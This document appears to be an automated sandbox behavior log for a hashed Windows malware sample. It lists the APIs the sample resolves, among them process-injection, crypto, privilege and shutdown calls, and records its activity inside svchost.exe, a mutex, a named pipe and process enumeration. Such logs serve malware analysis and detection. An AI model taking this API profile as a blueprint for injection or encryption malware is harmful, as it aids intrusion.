dc4ceb44d8bb1310e487d691de717647
SHA1: 6fb5662a14a79f7908b673bce6f5f44cb02b6cf1 SHA256: 8f648992dce9dc56dfab5cfadfa7aafd1c1329c2f2f47411fc941effe765a48d |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = E58EFF540968A436E982FCFA1C0445A2 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create Pipe | pipe_name = \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
